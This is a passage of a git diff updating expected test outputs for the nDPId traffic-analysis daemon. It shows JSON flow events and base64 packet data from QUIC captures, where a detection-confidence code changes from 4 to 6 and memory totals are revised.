+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1463060980364,"flow_last_seen":1463060980449,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","packets-captured":518,"packets-processed":518,"total-skipped-flows":0,"total-l4-payload-len":326810,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1463075954300} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 518/518 @@ -71,9 +71,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894262 bytes -~~ total memory freed........: 5894262 bytes -~~ total allocations/frees...: 118676/118676 +~~ total memory allocated....: 6027896 bytes +~~ total memory freed........: 6027896 bytes +~~ total allocations/frees...: 121438/121438 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 2271 chars diff --git a/test/results/quic046.pcap.out b/test/results/quic046.pcap.out index e98969e35..0b2461406 100644 --- a/test/results/quic046.pcap.out +++ b/test/results/quic046.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1584456191933} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584456191933,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1584456191933,"pkt":"ILABHGh4AJqdnpsZCABFAAViVw9AAIARNVbAqAHs2DrOVsWbAbsFTsB3w1EwNDZQtKT59fQu3TkAAAABmZPTs83+bYJOmUXloAEEAENITE8ZAAAAUEFEAPABAABTTkkA+wEAAFNUSwAxAgAAVkVSADUCAABDQ1MARQIAAE5PTkNlAgAAQUVBRGkCAABVQUlEmAIAAFNDSUSoAgAAVENJRKwCAABQRE1EsAIAAFNNSEy0AgAASUNTTLgCAABOT05Q2AIAAFBVQlP4AgAATUlEU\/wCAABTQ0xTAAMAAEtFWFMEAwAAWExDVAwDAABDU0NUDAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0taS55dGltZy5jb23iUlTd91Wbyacedc4KWbvYAO9ezSoYOG3jhMeQafLfpHKvILz9Ye+me5P5nrw5Y\/leQsX7MclRMDQ2AeiBYJKSGuh+7YCGohWCkV5w4f4wMDAwMDAwML0xAKSRUT2iY62vYCLSlIfkuoKwQUVTR0Nocm9tZS84MC4wLjM5ODcuMTMyIFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0mMqP9vF+kzJdLqfvNTDv5wAAAABYNTA5AQAAAB4AAABhJXvQ9+6Hu83ruEOa1Y6Y5fjbWd3ky8\/JdT+d+\/AZZsvZnn1BDAzSykK3Urbw\/IrLoBtlbcpqYoDEomljzhkwZAAAAAEAAABDMjU18ubMxD2HxlI1UlRPQUNLRPLmzMQ9h8ZSYDLLkqBBTd\/6RwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/80.0.3987.132 Windows NT 6.3; Win64; x64"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/80.0.3987.132 Windows NT 6.3; Win64; x64"}} 01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584456191934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":574,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":574,"pkt_l4_len":540,"thread_ts_msec":1584456191934,"pkt":"ILABHGh4AJqdnpsZCABFAAIwVxBAAIAROIfAqAHs2DrOVsWbAbsCHCGo01EwNDZQtKT59fQu3TkAAAAChrDGo43cDq7OAgdbv23GehH0jM01fB5SqCBHGsm4tNDoSAuylkVeyVU1nO51BVLZDdQpzNO9j8lf2o\/kFvxF1keBb1V8bWQbm4GDCTzD9DJbwk6JCzbiEHbQt2\/y4DufAauHa+qhpg6F7I1VBRA5chHzaHSfbKq18eEDQ2D7fby9uiPXDB6cfTGjCACXfFYXGo9zhyaFNtzZv4x3bPv04LGnwloRH845hLIF6d5Y+oKP0inx4RVaOxEjSkSubSvYLun8u1+DAfAvr3DdmGZRAp60H0VhNkgFDR0TK1bvdtwD\/6cndHRtyUINoQIRApDi1wb1MmCAOOvL7steTPHXY5nIkaq4iXTy+WyGwwX1EiuR+wqkWZoB8nUqj3ZqApzNfexl+c7aCawPzdHT3P5zDq7dSyz1wAkXCTveL49FopZWy\/uuB+P5RJbaGpw3CvzBYR4o98uBght36oYbWpopqUw9u0okr+r3kEm4Q75LZzqLS97VgZsNPml00CwyHuDEnhiPWf19O4H99TJdYurnXZ+SQi1Zt2RI1GgBrEOAj7V7V\/6W2VgqcYkPqL1UO6lW\/zp\/K8LZMma1gVsHh4jJ1oXnE7Qjtqi9Um0bkNgFqZBX1s4cYf2FTDL0Lgyu2DOK3ATmX6nv91Qh9\/msYcWCN59XOhhsFRlmXSuc2N2TzOTtWg=="} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584456191934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1584456191934,"pkt":"ILABHGh4AJqdnpsZCABFAAByVxFAAIAROkTAqAHs2DrOVsWbAbsAXuOl01EwNDZQtKT59fQu3TkAAAADQ7oFqOGvWa6mhIUAfFpbpAofPEreEA\/GGklYOasxEedYwPIHZE9zXMBgbnX+9bPuSN5MQzRW31QsSe2iJHxiKYqGbP8="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1584456191933,"flow_last_seen":1584456191986,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":87097,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1584456191986,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1584456191933,"flow_last_seen":1584456191986,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":87097,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1584456191986,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":87097,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1584456191986} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872391 bytes -~~ total memory freed........: 5872391 bytes -~~ total allocations/frees...: 118215/118215 +~~ total memory allocated....: 6006025 bytes +~~ total memory freed........: 6006025 bytes +~~ total allocations/frees...: 120977/120977 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2248 chars diff --git a/test/results/quic_0RTT.pcap.out b/test/results/quic_0RTT.pcap.out index 5de0df4ca..22678dd3f 100644 --- a/test/results/quic_0RTT.pcap.out +++ b/test/results/quic_0RTT.pcap.out @@ -2,9 +2,9 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1603888789791} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603888789791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603888789791,"pkt":"AAAAAAAAAAAAAAAAht1gINJtBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB7CsRWwTYBOvD\/wAAHAhCNdWrrb4+VQiw7LD1RGMN+zL7OkPMAtXpNlW5O0b2\/q+3KdcOtoYFqBIwOi4AbeOZTA9r8spxR89EzuGsSMH\/bUH9ekHEQ922xeaUjW2FgbWmXjMqS+663UY67NIITXpkFxwR22N+eMGvlLVxq1DPyvGiZiTcqCSaCZ0JYqKt+vdrIBp0w3K49QUaWm1DuJd+cQIJzCcz93gKXA+aQn8qJuO+lEHGyiCLVgeWI9\/dk7q4fiSnyVYB8Z\/88\/1PGsSPr7zMnahidPl8sGnTG9MT+px4myWEEHOjoSU0yW9DlNQElkOgitzZjllGvGhUhiBIICMF4QAUv3\/uP2UIoOlO5XivEkb+TEkDY+TeRlQOAIIUbsGZNooxIOe9TQJ82TvA7CrEVTKBa\/0UwEVbDA+egVUviZQiH5ib3Eft7yjRSwrLosJr+JYLE\/b1gPCQqV3\/X9AjXGrd184V\/I069AxL1W3hrfjhc9kTxr61FQb3iBePpHQNPrmWPpWzg65lBvr27yyzoj6wYSTbO781l0YatfDl\/dDvdQIfKr2P6uLMGzJJZkB+Ef6aEehROc00Tde4mLvS3KtN0T7iH4IEsYc3Db9k0scho9GMCBSBIiEPvgGR0Y67dvPV5slktWIWuArg\/VlYjYX5wnaRfV563WjXbTYNGUsYH6yJ12K39PLd+9sxGuDsDv7wuOHQ\/wAAHAhCNdWrrb4+VQiw7LD1RGMN+0KnwyOIE1IPFP+gl6zZC2dnhr2vJbjX4p4gjfOHidbDFdeXHDeCB6AR+v8jJSYiWVKpOKT1tYDZ2eaYAb8EM4juskAwg8WJRDDALjE67avfbFy2bAKFGVwliLbq9g9yfe2DG7zudaoq7VcKjW8DJUYzFu0kG3f0I+eg9KERSSE9tNgraaUChfDY0CfeGXPHIGfNOqV2eildt3CypMlgx434dmv5i8bOFyWursPeR9FPxLAp0E17z39ZowCy9mzMTuEiKSfVFZVEb8A56B9ppGExgQC8QO0Af3vfqS2ttKNvFYUOgdWvnxDVxIQ3xlWS6ELnr9IEyJP7QN13nNZW2yyDnRClGdlAqhKZndvswyZgxdwswpMFr+Hp46L60HP3+Etr\/g+ZQ+dSKaPL8j+qjU4\/5GbDlG+Y8GGpP5yetDzWW4wN5wTi1RfvXLkUi4VB3m4LwQbvS4nockw+p2t9FIJYuLtV0dMHU6Hv7HaVbrS2rEeooj88IkO1U14qUJPxLmg2Uy36iXq2YaI6VfIvwaNOpQxMq6KJ4BIC327gV6F7pkRGqQyr\/fLXQ9\/QAgpjmMNkP95RpEi6vYM4P3hLk7YGQVBnB+IU0NE43CFBWiQCbD6GGRc88ZdV8uxhElyGuoq\/YHF3odV6QEFs9PDd2W40mlJEPTrU\/YbNrDK9EX6uJSY7GfN5JJTDeEvWfQOsQ0uy8IYjlyJ5TxtnQXnq04wVfUtffinNWMR7cNrjwWmw0LkdigoLMel\/dN7JQkDILpNPwSYQ07T0bRnC52xgOJ5umHTPriox2zwHfRI6lLvfBx7j5PR\/iXTtkoj6weekfmGYFZhQNsP1hkCk+6CJfCIo1m1SFLNWhogGJZIJgLWrvdtqIciw9ptTqsx5dUUsMd3KoDy70p2VEA=="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"abcd","version":"TLSv1.3","alpn":"h3-32","ja3":"a7b629a5bd67bfc25e2c78b3daa4c12f","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"abcd","version":"TLSv1.3","alpn":"h3-32","ja3":"a7b629a5bd67bfc25e2c78b3daa4c12f","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1603888789792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603888789792,"pkt":"AAAAAAAAAAAAAAAAht1gIEmLBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvsKwTYBOuB\/wAAHAiw7LD1RGMN+wgWsFEjN2HZaQBAoeulPe6gJ\/sr\/GIbyJYc14UNgXtYbxk5qiSqETQY4WZpoAlQETVvk0wWYFOpUIdBARl1suh9iNp9EVeqqDCK8cOmjC1x9D6Kfk9hGxfOeT71tvhKd4oN+bdYPjbqVP0GFxeHN3IMs7Zr+fKeQyuFIUWnb5Z155Se3XdA\/gkvhnMx1ULX5WEKCC9gZx60DO5zH6utYTXgxvBd7Ru+OqadPKlFof8AABwIsOyw9URjDfsIFrBRIzdh2WlAxDmD+hjo+e1bU72YwbmAGOLxO5htQDsPNuVs6LSSsGz3SFw0RPm4E415JCnhx8Ge0QKEWADh5iBKGwMueF2ztpwDH7jsWxr3wB6t01oBA1kA7ZvkbHO543VSXW8URQBDqZoClPbnrQAcBZ+H69\/w3iitABvrJy3KVNkC9+NdHjbogcNpY\/5rLpRLS5HK\/H6JgUnP0BdrxIIF6HWRic\/Wf7gn1j0WoelZtuUrK3RpR66wFjn8EMNQiKG+ggDuldLKh\/U6tL0BsOyw9URjDfuFTTkGJh6F+XUUpTe3M82jojmegspYUKam1MxQec2Qkg\/alipH7KpbN4YAt16GjKA0vziYX61TA5r\/+c+B2T\/sfMV9v\/HKdLDeTVTmLVtM6L+LQWLFNxbF4yrEngXf\/VZT2XaqBGXuy2LCG0Ll9PjYDBtAtstKFFXX1\/Aq9PC+CdywR1PopMQdX5Z9pMSyZiyB5Lzg3cVGVQshXQFro5Kf54d6amO7D2XxOTcZnQiaAf\/TGRrLMf2QELrrUW5vGD6IdIKDtOHH0dTjyWhDTPJEfsacf7m9B9Xhce36eKCRqwlUUYp9cEORg9tAs+LNJkhiCPhfdI2kmtp2bekrtpez6Fafq\/eSu5bTHdTjUlYAqlsCVns0h2QvzRkddQkOUP7gAh5QNKxagIYkVNaIjoRzRpVUuqTaY5AYQbzrX47APe8VY1hIf5XFE6TPMKmMe2Q\/0CtWSycEDeCk28gGteNWfkas+cB+UI1rrRtWgkmad7zXpxmJvEVKx1EjCgwWfU89z+KDl6jD4P4IeVlDy+ynTr4HbYfYMZyTtc1RDHu8b7675WQKM\/HIrQq6E8CeXlwrV\/kN4X7y3aDTZ8UUUEk3f6P1Q8uLPJ2Yruxo4hJaXf2cw6q7EdHqcpvwl9wyP0SydRM5I5Xs9cDxcS9AAJl75598Onx7hfnsjzw2+Lk4PiuB9x8RRtBxDIfr1GIv04yL1ivxWfjBmvn9aCE1EDAtVLxBhg2AhlMxK5+fcZuD8gajCU3jBim0JQ1mEhqnrWZNbjfhTXGYll4oRXXUgYKlIV5s1CchSlcMgg5uu0+4Aj3J0p8FsizlxDbb6CHs\/xgqFSxARbNxD3LVLxEd+HIIdIWwvT1MTqPrwh0uOKGI3kFXzTPm+StyKn3RLAeyIgL4EkpQslwgXWxlUtDWXyicGhGk5giCxEYaSUkCR2ecvlHkQpbq28IGeTXJEr9czuuYuc6xx6JNXW8HuS7eYhN\/9rkNRrkW+Ih9+rtXr1O+2Dy7ZXSKTG4Wnmba1vr6ZEKbxvCvQURsWLQQxX5DHxb0xG+It92fZknkVToOutQ6p1RiqEpFpKmIm03EPunCuw=="} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603888789791,"flow_last_seen":1603888789792,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789792,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603888789791,"flow_last_seen":1603888789792,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789792,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":2464,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1603888789792} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878175 bytes -~~ total memory freed........: 5878175 bytes -~~ total allocations/frees...: 118137/118137 +~~ total memory allocated....: 6011809 bytes +~~ total memory freed........: 6011809 bytes +~~ total allocations/frees...: 120899/120899 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2139 chars diff --git a/test/results/quic_crypto_aes_auth_size.pcap.out b/test/results/quic_crypto_aes_auth_size.pcap.out index 5ef9ae9e5..f5ca7ae5d 100644 --- a/test/results/quic_crypto_aes_auth_size.pcap.out +++ b/test/results/quic_crypto_aes_auth_size.pcap.out @@ -2,12 +2,12 @@ 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639054047280} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054047280,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 